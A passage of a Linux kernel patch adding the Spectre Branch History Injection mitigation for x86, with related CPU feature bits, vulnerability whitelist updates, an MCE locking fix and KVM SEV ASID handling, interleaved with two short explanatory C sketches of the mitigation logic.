+-#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
++#define DISABLED_MASK21	0
++#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 22)
+ 
+ #endif /* _ASM_X86_DISABLED_FEATURES_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 33a19ef23644d..681e8401b8a35 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -55,10 +55,13 @@
+ #define SPEC_CTRL_SSBD			BIT(SPEC_CTRL_SSBD_SHIFT)	/* Speculative Store Bypass Disable */
+ #define SPEC_CTRL_RRSBA_DIS_S_SHIFT	6	   /* Disable RRSBA behavior */
+ #define SPEC_CTRL_RRSBA_DIS_S		BIT(SPEC_CTRL_RRSBA_DIS_S_SHIFT)
++#define SPEC_CTRL_BHI_DIS_S_SHIFT	10	   /* Disable Branch History Injection behavior */
++#define SPEC_CTRL_BHI_DIS_S		BIT(SPEC_CTRL_BHI_DIS_S_SHIFT)
+ 
+ /* A mask for bits which the kernel toggles when controlling mitigations */
+ #define SPEC_CTRL_MITIGATIONS_MASK	(SPEC_CTRL_IBRS | SPEC_CTRL_STIBP | SPEC_CTRL_SSBD \
+-							| SPEC_CTRL_RRSBA_DIS_S)
++							| SPEC_CTRL_RRSBA_DIS_S \
++							| SPEC_CTRL_BHI_DIS_S)
+ 
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
+@@ -157,6 +160,10 @@
+ 						 * are restricted to targets in
+ 						 * kernel.
+ 						 */
++#define ARCH_CAP_BHI_NO			BIT(20)	/*
++						 * CPU is not affected by Branch
++						 * History Injection.
++						 */
+ #define ARCH_CAP_PBRSB_NO		BIT(24)	/*
+ 						 * Not susceptible to Post-Barrier
+ 						 * Return Stack Buffer Predictions.
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index 8f6f17a8617b6..1e481d308e188 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -167,11 +167,20 @@
+ .Lskip_rsb_\@:
+ .endm
+ 
++/*
++ * The CALL to srso_alias_untrain_ret() must be patched in directly at
++ * the spot where untraining must be done, i.e., srso_alias_untrain_ret()
++ * must be the target of a CALL instruction instead of indirectly
++ * jumping to a wrapper which then calls it. Therefore, this macro is
++ * called outside of __UNTRAIN_RET below for the time being, until the
++ * kernel supports nested alternatives with arbitrary nesting.
++ */
++.macro CALL_UNTRAIN_RET
+ #ifdef CONFIG_CPU_UNRET_ENTRY
+-#define CALL_UNTRAIN_RET	"call entry_untrain_ret"
+-#else
+-#define CALL_UNTRAIN_RET	""
++	ALTERNATIVE_2 "", "call entry_untrain_ret", X86_FEATURE_UNRET, \
++		          "call srso_alias_untrain_ret", X86_FEATURE_SRSO_ALIAS
+ #endif
++.endm
+ 
+ /*
+  * Mitigate RETBleed for AMD/Hygon Zen uarch. Requires KERNEL CR3 because the
+@@ -188,9 +197,8 @@
+ #if defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_IBPB_ENTRY) || \
+ 	defined(CONFIG_CPU_SRSO)
+ 	ANNOTATE_UNRET_END
+-	ALTERNATIVE_2 "",						\
+-		      CALL_UNTRAIN_RET, X86_FEATURE_UNRET,		\
+-		      "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
++	CALL_UNTRAIN_RET
++	ALTERNATIVE "", "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
+ #endif
+ .endm
+ 
+@@ -207,6 +215,19 @@
+ .Lskip_verw_\@:
+ .endm
+ 
++#ifdef CONFIG_X86_64
++.macro CLEAR_BRANCH_HISTORY
++	ALTERNATIVE "", "call clear_bhb_loop", X86_FEATURE_CLEAR_BHB_LOOP
++.endm
++
++.macro CLEAR_BRANCH_HISTORY_VMEXIT
++	ALTERNATIVE "", "call clear_bhb_loop", X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT
++.endm
++#else
++#define CLEAR_BRANCH_HISTORY
++#define CLEAR_BRANCH_HISTORY_VMEXIT
++#endif
++
+ #else /* __ASSEMBLY__ */
+ 
+ #define ANNOTATE_RETPOLINE_SAFE					\
+@@ -235,6 +256,10 @@ extern void srso_alias_untrain_ret(void);
+ extern void entry_untrain_ret(void);
+ extern void entry_ibpb(void);
+ 
++#ifdef CONFIG_X86_64
++extern void clear_bhb_loop(void);
++#endif
++
+ extern void (*x86_return_thunk)(void);
+ 
+ #ifdef CONFIG_RETPOLINE
+diff --git a/arch/x86/include/asm/required-features.h b/arch/x86/include/asm/required-features.h
+index 7ba1726b71c7b..e9187ddd3d1fd 100644
+--- a/arch/x86/include/asm/required-features.h
++++ b/arch/x86/include/asm/required-features.h
+@@ -99,6 +99,7 @@
+ #define REQUIRED_MASK18	0
+ #define REQUIRED_MASK19	0
+ #define REQUIRED_MASK20	0
+-#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
++#define REQUIRED_MASK21	0
++#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 22)
+ 
+ #endif /* _ASM_X86_REQUIRED_FEATURES_H */
+diff --git a/arch/x86/include/asm/syscall.h b/arch/x86/include/asm/syscall.h
+index 5b85987a5e97c..2725a4502321b 100644
+--- a/arch/x86/include/asm/syscall.h
++++ b/arch/x86/include/asm/syscall.h
+@@ -16,19 +16,17 @@
+ #include <asm/thread_info.h>	/* for TS_COMPAT */
+ #include <asm/unistd.h>
+ 
++/* This is used purely for kernel/trace/trace_syscalls.c */
+ typedef long (*sys_call_ptr_t)(const struct pt_regs *);
+ extern const sys_call_ptr_t sys_call_table[];
+ 
+-#if defined(CONFIG_X86_32)
+-#define ia32_sys_call_table sys_call_table
+-#else
+ /*
+  * These may not exist, but still put the prototypes in so we
+  * can use IS_ENABLED().
+  */
+-extern const sys_call_ptr_t ia32_sys_call_table[];
+-extern const sys_call_ptr_t x32_sys_call_table[];
+-#endif
++extern long ia32_sys_call(const struct pt_regs *, unsigned int nr);
++extern long x32_sys_call(const struct pt_regs *, unsigned int nr);
++extern long x64_sys_call(const struct pt_regs *, unsigned int nr);
+ 
+ /*
+  * Only the low 32 bits of orig_ax are meaningful, so we return int.
+@@ -129,6 +127,7 @@ static inline int syscall_get_arch(struct task_struct *task)
+ void do_syscall_64(struct pt_regs *regs, int nr);
+ void do_int80_syscall_32(struct pt_regs *regs);
+ long do_fast_syscall_32(struct pt_regs *regs);
++void do_int80_emulation(struct pt_regs *regs);
+ 
+ #endif	/* CONFIG_X86_32 */
+ 
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index e3fec47a800bf..96bd3ee83a484 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1584,6 +1584,79 @@ static void __init spectre_v2_determine_rsb_fill_type_at_vmexit(enum spectre_v2_
+ 	dump_stack();
+ }
+ 
++/*
++ * Set BHI_DIS_S to prevent indirect branches in the kernel from being
++ * influenced by branch history in userspace. Not needed if BHI_NO is set.
++ */
++static bool __init spec_ctrl_bhi_dis(void)
++{
++	if (!boot_cpu_has(X86_FEATURE_BHI_CTRL))
++		return false;
++
++	x86_spec_ctrl_base |= SPEC_CTRL_BHI_DIS_S;
++	update_spec_ctrl(x86_spec_ctrl_base);
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_HW);
++
++	return true;
++}
++
++enum bhi_mitigations {
++	BHI_MITIGATION_OFF,
++	BHI_MITIGATION_ON,
++	BHI_MITIGATION_AUTO,
++};
++
++static enum bhi_mitigations bhi_mitigation __ro_after_init =
++	IS_ENABLED(CONFIG_SPECTRE_BHI_ON)  ? BHI_MITIGATION_ON  :
++	IS_ENABLED(CONFIG_SPECTRE_BHI_OFF) ? BHI_MITIGATION_OFF :
++					     BHI_MITIGATION_AUTO;
++
++static int __init spectre_bhi_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!strcmp(str, "off"))
++		bhi_mitigation = BHI_MITIGATION_OFF;
++	else if (!strcmp(str, "on"))
++		bhi_mitigation = BHI_MITIGATION_ON;
++	else if (!strcmp(str, "auto"))
++		bhi_mitigation = BHI_MITIGATION_AUTO;
++	else
++		pr_err("Ignoring unknown spectre_bhi option (%s)\n", str);
++
++	return 0;
++}
++early_param("spectre_bhi", spectre_bhi_parse_cmdline);
++
++static void __init bhi_select_mitigation(void)
++{
++	if (bhi_mitigation == BHI_MITIGATION_OFF)
++		return;
++
++	/* Retpoline mitigates against BHI unless the CPU has RRSBA behavior */
++	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE) &&
++	    !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
++		return;
++
++	if (spec_ctrl_bhi_dis())
++		return;
++
++	if (!IS_ENABLED(CONFIG_X86_64))
++		return;
++
++	/* Mitigate KVM by default */
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT);
++	pr_info("Spectre BHI mitigation: SW BHB clearing on vm exit\n");
++
++	if (bhi_mitigation == BHI_MITIGATION_AUTO)
++		return;
++
++	/* Mitigate syscalls when the mitigation is forced =on */
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP);
++	pr_info("Spectre BHI mitigation: SW BHB clearing on syscall\n");
++}
++
+ static void __init spectre_v2_select_mitigation(void)
+ {
+ 	enum spectre_v2_mitigation_cmd cmd = spectre_v2_parse_cmdline();
+@@ -1694,6 +1767,9 @@ static void __init spectre_v2_select_mitigation(void)
+ 	    mode == SPECTRE_V2_RETPOLINE)
+ 		spec_ctrl_disable_kernel_rrsba();
+ 
++	if (boot_cpu_has(X86_BUG_BHI))
++		bhi_select_mitigation();
++
+ 	spectre_v2_enabled = mode;
+ 	pr_info("%s\n", spectre_v2_strings[mode]);
+ 
+@@ -2674,15 +2750,15 @@ static char *stibp_state(void)
+ 
+ 	switch (spectre_v2_user_stibp) {
+ 	case SPECTRE_V2_USER_NONE:
+-		return ", STIBP: disabled";
++		return "; STIBP: disabled";
+ 	case SPECTRE_V2_USER_STRICT:
+-		return ", STIBP: forced";
++		return "; STIBP: forced";
+ 	case SPECTRE_V2_USER_STRICT_PREFERRED:
+-		return ", STIBP: always-on";
++		return "; STIBP: always-on";
+ 	case SPECTRE_V2_USER_PRCTL:
+ 	case SPECTRE_V2_USER_SECCOMP:
+ 		if (static_key_enabled(&switch_to_cond_stibp))
+-			return ", STIBP: conditional";
++			return "; STIBP: conditional";
+ 	}
+ 	return "";
+ }
+@@ -2691,10 +2767,10 @@ static char *ibpb_state(void)
+ {
+ 	if (boot_cpu_has(X86_FEATURE_IBPB)) {
+ 		if (static_key_enabled(&switch_mm_always_ibpb))
+-			return ", IBPB: always-on";
++			return "; IBPB: always-on";
+ 		if (static_key_enabled(&switch_mm_cond_ibpb))
+-			return ", IBPB: conditional";
+-		return ", IBPB: disabled";
++			return "; IBPB: conditional";
++		return "; IBPB: disabled";
+ 	}
+ 	return "";
+ }
+@@ -2704,14 +2780,31 @@ static char *pbrsb_eibrs_state(void)
+ 	if (boot_cpu_has_bug(X86_BUG_EIBRS_PBRSB)) {
+ 		if (boot_cpu_has(X86_FEATURE_RSB_VMEXIT_LITE) ||
+ 		    boot_cpu_has(X86_FEATURE_RSB_VMEXIT))
+-			return ", PBRSB-eIBRS: SW sequence";
++			return "; PBRSB-eIBRS: SW sequence";
+ 		else
+-			return ", PBRSB-eIBRS: Vulnerable";
++			return "; PBRSB-eIBRS: Vulnerable";
+ 	} else {
+-		return ", PBRSB-eIBRS: Not affected";
++		return "; PBRSB-eIBRS: Not affected";
+ 	}
+ }
+ 
++static const char *spectre_bhi_state(void)
++{
++	if (!boot_cpu_has_bug(X86_BUG_BHI))
++		return "; BHI: Not affected";
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_HW))
++		return "; BHI: BHI_DIS_S";
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
++		return "; BHI: SW loop, KVM: SW loop";
++	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
++		 !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
++		return "; BHI: Retpoline";
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
++		return "; BHI: Syscall hardening, KVM: SW loop";
++
++	return "; BHI: Vulnerable (Syscall hardening enabled)";
++}
++
+ static ssize_t spectre_v2_show_state(char *buf)
+ {
+ 	if (spectre_v2_enabled == SPECTRE_V2_LFENCE)
+@@ -2724,13 +2817,15 @@ static ssize_t spectre_v2_show_state(char *buf)
+ 	    spectre_v2_enabled == SPECTRE_V2_EIBRS_LFENCE)
+ 		return sysfs_emit(buf, "Vulnerable: eIBRS+LFENCE with unprivileged eBPF and SMT\n");
+ 
+-	return sysfs_emit(buf, "%s%s%s%s%s%s%s\n",
++	return sysfs_emit(buf, "%s%s%s%s%s%s%s%s\n",
+ 			  spectre_v2_strings[spectre_v2_enabled],
+ 			  ibpb_state(),
+-			  boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? ", IBRS_FW" : "",
++			  boot_cpu_has(X86_FEATURE_USE_IBRS_FW) ? "; IBRS_FW" : "",
+ 			  stibp_state(),
+-			  boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? ", RSB filling" : "",
++			  boot_cpu_has(X86_FEATURE_RSB_CTXSW) ? "; RSB filling" : "",
+ 			  pbrsb_eibrs_state(),
++			  spectre_bhi_state(),
++			  /* this should always be at the end */
+ 			  spectre_v2_module_string());
+ }
+ 
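
For readability, the decision order in bhi_select_mitigation() above can be
condensed into a small pure function. This is a hedged sketch with invented
names (pick_bhi and the enum are not kernel identifiers); the first check
that fires wins, matching the early returns in the real code.

#include <stdbool.h>
#include <stdio.h>

enum bhi_choice {
	BHI_NONE, BHI_RETPOLINE, BHI_HW, BHI_VMEXIT_ONLY, BHI_FULL_SW,
};

static enum bhi_choice pick_bhi(bool off, bool retpoline, bool rrsba,
				bool bhi_ctrl, bool x86_64, bool forced_on)
{
	if (off)
		return BHI_NONE;
	if (retpoline && !rrsba)	/* retpoline already covers BHI */
		return BHI_RETPOLINE;
	if (bhi_ctrl)			/* prefer the BHI_DIS_S HW control */
		return BHI_HW;
	if (!x86_64)			/* SW loop is 64-bit only */
		return BHI_NONE;
	/* KVM is mitigated by default; syscalls only when forced =on */
	return forced_on ? BHI_FULL_SW : BHI_VMEXIT_ONLY;
}

int main(void)
{
	/* auto on a 64-bit eIBRS part without BHI_DIS_S: VM exits only */
	printf("%d\n", pick_bhi(false, false, false, false, true, false));
	return 0;
}
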
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index ca243d7ba0ea5..08fe77d2a3f90 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1144,6 +1144,7 @@ static void identify_cpu_without_cpuid(struct cpuinfo_x86 *c)
+ #define NO_SPECTRE_V2		BIT(8)
+ #define NO_MMIO			BIT(9)
+ #define NO_EIBRS_PBRSB		BIT(10)
++#define NO_BHI			BIT(11)
+ 
+ #define VULNWL(vendor, family, model, whitelist)	\
+ 	X86_MATCH_VENDOR_FAM_MODEL(vendor, family, model, whitelist)
+@@ -1206,18 +1207,18 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ 	VULNWL_INTEL(ATOM_TREMONT_D,		NO_ITLB_MULTIHIT | NO_EIBRS_PBRSB),
+ 
+ 	/* AMD Family 0xf - 0x12 */
+-	VULNWL_AMD(0x0f,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_AMD(0x10,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_AMD(0x11,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
+-	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO),
++	VULNWL_AMD(0x0f,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
++	VULNWL_AMD(0x10,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
++	VULNWL_AMD(0x11,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
++	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_BHI),
+ 
+ 	/* FAMILY_ANY must be last, otherwise 0x0f - 0x12 matches won't work */
+-	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
+-	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB),
++	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB | NO_BHI),
++	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT | NO_MMIO | NO_EIBRS_PBRSB | NO_BHI),
+ 
+ 	/* Zhaoxin Family 7 */
+-	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO),
+-	VULNWL(ZHAOXIN,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO),
++	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO | NO_BHI),
++	VULNWL(ZHAOXIN,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS | NO_MMIO | NO_BHI),
+ 	{}
+ };
+ 
+@@ -1454,6 +1455,13 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	if (vulnerable_to_rfds(ia32_cap))
+ 		setup_force_cpu_bug(X86_BUG_RFDS);
+ 
++	/* When virtualized, eIBRS could be hidden, assume vulnerable */
++	if (!(ia32_cap & ARCH_CAP_BHI_NO) &&
++	    !cpu_matches(cpu_vuln_whitelist, NO_BHI) &&
++	    (boot_cpu_has(X86_FEATURE_IBRS_ENHANCED) ||
++	     boot_cpu_has(X86_FEATURE_HYPERVISOR)))
++		setup_force_cpu_bug(X86_BUG_BHI);
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
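
The new X86_BUG_BHI check above boils down to three independent signals; as
a boolean condensation (the function and parameter names here are invented):

#include <stdbool.h>
#include <stdio.h>

/*
 * Affected unless the CPU enumerates BHI_NO or sits on the NO_BHI
 * whitelist, and only when eIBRS is present -- or when running under a
 * hypervisor, where eIBRS may be hidden from the guest.
 */
static bool cpu_has_bug_bhi(bool bhi_no, bool whitelisted,
			    bool eibrs, bool hypervisor)
{
	return !bhi_no && !whitelisted && (eibrs || hypervisor);
}

int main(void)
{
	/* bare-metal eIBRS part without BHI_NO: affected */
	printf("%d\n", cpu_has_bug_bhi(false, false, true, false));
	return 0;
}
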
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index cad6ea1911e9b..359218bc1b34b 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -2471,12 +2471,14 @@ static ssize_t set_bank(struct device *s, struct device_attribute *attr,
+ 		return -EINVAL;
+ 
+ 	b = &per_cpu(mce_banks_array, s->id)[bank];
+-
+ 	if (!b->init)
+ 		return -ENODEV;
+ 
+ 	b->ctl = new;
++
++	mutex_lock(&mce_sysfs_mutex);
+ 	mce_restart();
++	mutex_unlock(&mce_sysfs_mutex);
+ 
+ 	return size;
+ }
+diff --git a/arch/x86/kernel/cpu/scattered.c b/arch/x86/kernel/cpu/scattered.c
+index fc01f81f6e2a3..28c357cf7c75e 100644
+--- a/arch/x86/kernel/cpu/scattered.c
++++ b/arch/x86/kernel/cpu/scattered.c
+@@ -28,6 +28,7 @@ static const struct cpuid_bit cpuid_bits[] = {
+ 	{ X86_FEATURE_EPB,		CPUID_ECX,  3, 0x00000006, 0 },
+ 	{ X86_FEATURE_INTEL_PPIN,	CPUID_EBX,  0, 0x00000007, 1 },
+ 	{ X86_FEATURE_RRSBA_CTRL,	CPUID_EDX,  2, 0x00000007, 2 },
++	{ X86_FEATURE_BHI_CTRL,		CPUID_EDX,  4, 0x00000007, 2 },
+ 	{ X86_FEATURE_CQM_LLC,		CPUID_EDX,  1, 0x0000000f, 0 },
+ 	{ X86_FEATURE_CQM_OCCUP_LLC,	CPUID_EDX,  0, 0x0000000f, 1 },
+ 	{ X86_FEATURE_CQM_MBM_TOTAL,	CPUID_EDX,  1, 0x0000000f, 1 },
+@@ -46,6 +47,7 @@ static const struct cpuid_bit cpuid_bits[] = {
+ 	{ X86_FEATURE_MBA,		CPUID_EBX,  6, 0x80000008, 0 },
+ 	{ X86_FEATURE_PERFMON_V2,	CPUID_EAX,  0, 0x80000022, 0 },
+ 	{ X86_FEATURE_AMD_LBR_V2,	CPUID_EAX,  1, 0x80000022, 0 },
++	{ X86_FEATURE_AMD_LBR_PMC_FREEZE,	CPUID_EAX,  2, 0x80000022, 0 },
+ 	{ 0, 0, 0, 0, 0 }
+ };
+ 
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index d1ffac9ad611d..18a034613d94d 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -33,6 +33,7 @@
+ #include <asm/numa.h>
+ #include <asm/bios_ebda.h>
+ #include <asm/bugs.h>
++#include <asm/coco.h>
+ #include <asm/cpu.h>
+ #include <asm/efi.h>
+ #include <asm/gart.h>
+@@ -1132,6 +1133,7 @@ void __init setup_arch(char **cmdline_p)
+ 	 * memory size.
+ 	 */
+ 	sev_setup_arch();
++	cc_random_init();
+ 
+ 	efi_fake_memmap();
+ 	efi_find_mirror();
+diff --git a/arch/x86/kvm/reverse_cpuid.h b/arch/x86/kvm/reverse_cpuid.h
+index 7c8e2b20a13b0..e43909d6504af 100644
+--- a/arch/x86/kvm/reverse_cpuid.h
++++ b/arch/x86/kvm/reverse_cpuid.h
+@@ -42,7 +42,7 @@ enum kvm_only_cpuid_leafs {
+ #define X86_FEATURE_IPRED_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 1)
+ #define KVM_X86_FEATURE_RRSBA_CTRL	KVM_X86_FEATURE(CPUID_7_2_EDX, 2)
+ #define X86_FEATURE_DDPD_U		KVM_X86_FEATURE(CPUID_7_2_EDX, 3)
+-#define X86_FEATURE_BHI_CTRL		KVM_X86_FEATURE(CPUID_7_2_EDX, 4)
++#define KVM_X86_FEATURE_BHI_CTRL	KVM_X86_FEATURE(CPUID_7_2_EDX, 4)
+ #define X86_FEATURE_MCDT_NO		KVM_X86_FEATURE(CPUID_7_2_EDX, 5)
+ 
+ struct cpuid_reg {
+@@ -83,10 +83,12 @@ static const struct cpuid_reg reverse_cpuid[] = {
+  */
+ static __always_inline void reverse_cpuid_check(unsigned int x86_leaf)
+ {
++	BUILD_BUG_ON(NR_CPUID_WORDS != NCAPINTS);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_1);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_2);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_3);
+ 	BUILD_BUG_ON(x86_leaf == CPUID_LNX_4);
++	BUILD_BUG_ON(x86_leaf == CPUID_LNX_5);
+ 	BUILD_BUG_ON(x86_leaf >= ARRAY_SIZE(reverse_cpuid));
+ 	BUILD_BUG_ON(reverse_cpuid[x86_leaf].function == 0);
+ }
+@@ -104,6 +106,7 @@ static __always_inline u32 __feature_translate(int x86_feature)
+ 	KVM_X86_TRANSLATE_FEATURE(SGX1);
+ 	KVM_X86_TRANSLATE_FEATURE(SGX2);
+ 	KVM_X86_TRANSLATE_FEATURE(RRSBA_CTRL);
++	KVM_X86_TRANSLATE_FEATURE(BHI_CTRL);
+ 	default:
+ 		return x86_feature;
+ 	}
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 3dc0ee1fe9db9..d8e192ad59538 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -76,9 +76,10 @@ struct enc_region {
+ };
+ 
+ /* Called with the sev_bitmap_lock held, or on shutdown  */
+-static int sev_flush_asids(int min_asid, int max_asid)
++static int sev_flush_asids(unsigned int min_asid, unsigned int max_asid)
+ {
+-	int ret, asid, error = 0;
++	int ret, error = 0;
++	unsigned int asid;
+ 
+ 	/* Check if there are any ASIDs to reclaim before performing a flush */
+ 	asid = find_next_bit(sev_reclaim_asid_bitmap, nr_asids, min_asid);
+@@ -108,7 +109,7 @@ static inline bool is_mirroring_enc_context(struct kvm *kvm)
+ }
+ 
+ /* Must be called with the sev_bitmap_lock held */
+-static bool __sev_recycle_asids(int min_asid, int max_asid)
++static bool __sev_recycle_asids(unsigned int min_asid, unsigned int max_asid)
+ {
+ 	if (sev_flush_asids(min_asid, max_asid))
+ 		return false;
+@@ -135,8 +136,20 @@ static void sev_misc_cg_uncharge(struct kvm_sev_info *sev)
+ 
+ static int sev_asid_new(struct kvm_sev_info *sev)
+ {
+-	int asid, min_asid, max_asid, ret;
++	/*
++	 * SEV-enabled guests must use ASIDs from min_sev_asid to max_sev_asid.
++	 * SEV-ES-enabled guests can use ASIDs from 1 to min_sev_asid - 1.
++	 * Note: min ASID can end up larger than the max if basic SEV support is
++	 * effectively disabled by disallowing use of ASIDs for SEV guests.
++	 */
++	unsigned int min_asid = sev->es_active ? 1 : min_sev_asid;
++	unsigned int max_asid = sev->es_active ? min_sev_asid - 1 : max_sev_asid;
++	unsigned int asid;
+ 	bool retry = true;
++	int ret;
++
++	if (min_asid > max_asid)
++		return -ENOTTY;
+ 
+ 	WARN_ON(sev->misc_cg);
+ 	sev->misc_cg = get_current_misc_cg();
+@@ -149,12 +162,6 @@ static int sev_asid_new(struct kvm_sev_info *sev)
+ 
+ 	mutex_lock(&sev_bitmap_lock);
+ 
+-	/*
+-	 * SEV-enabled guests must use asid from min_sev_asid to max_sev_asid.
+-	 * SEV-ES-enabled guest can use from 1 to min_sev_asid - 1.
+-	 */
+-	min_asid = sev->es_active ? 1 : min_sev_asid;
+-	max_asid = sev->es_active ? min_sev_asid - 1 : max_sev_asid;
+ again:
+ 	asid = find_next_zero_bit(sev_asid_bitmap, max_asid + 1, min_asid);
+ 	if (asid > max_asid) {
+@@ -179,7 +186,7 @@ static int sev_asid_new(struct kvm_sev_info *sev)
+ 	return ret;
+ }
+ 
+-static int sev_get_asid(struct kvm *kvm)
++static unsigned int sev_get_asid(struct kvm *kvm)
+ {
+ 	struct kvm_sev_info *sev = &to_kvm_svm(kvm)->sev_info;
+ 
+@@ -276,8 +283,8 @@ static int sev_guest_init(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ static int sev_bind_asid(struct kvm *kvm, unsigned int handle, int *error)
+ {
++	unsigned int asid = sev_get_asid(kvm);
+ 	struct sev_data_activate activate;
+-	int asid = sev_get_asid(kvm);
+ 	int ret;
+ 
+ 	/* activate ASID on the given handle */
+@@ -2213,11 +2220,10 @@ void __init sev_hardware_setup(void)
+ 		goto out;
+ 	}
+ 
+-	sev_asid_count = max_sev_asid - min_sev_asid + 1;
+-	if (misc_cg_set_capacity(MISC_CG_RES_SEV, sev_asid_count))
+-		goto out;
+-
+-	pr_info("SEV supported: %u ASIDs\n", sev_asid_count);
++	if (min_sev_asid <= max_sev_asid) {
++		sev_asid_count = max_sev_asid - min_sev_asid + 1;
++		WARN_ON_ONCE(misc_cg_set_capacity(MISC_CG_RES_SEV, sev_asid_count));
++	}
+ 	sev_supported = true;
+ 
+ 	/* SEV-ES support requested? */
+@@ -2242,13 +2248,21 @@ void __init sev_hardware_setup(void)
+ 		goto out;
+ 
+ 	sev_es_asid_count = min_sev_asid - 1;
+-	if (misc_cg_set_capacity(MISC_CG_RES_SEV_ES, sev_es_asid_count))
+-		goto out;
+-
+-	pr_info("SEV-ES supported: %u ASIDs\n", sev_es_asid_count);
++	WARN_ON_ONCE(misc_cg_set_capacity(MISC_CG_RES_SEV_ES, sev_es_asid_count));
+ 	sev_es_supported = true;
+ 
+ out:
++	if (boot_cpu_has(X86_FEATURE_SEV))
++		pr_info("SEV %s (ASIDs %u - %u)\n",
++			sev_supported ? min_sev_asid <= max_sev_asid ? "enabled" :
++								       "unusable" :
++								       "disabled",
++			min_sev_asid, max_sev_asid);
++	if (boot_cpu_has(X86_FEATURE_SEV_ES))
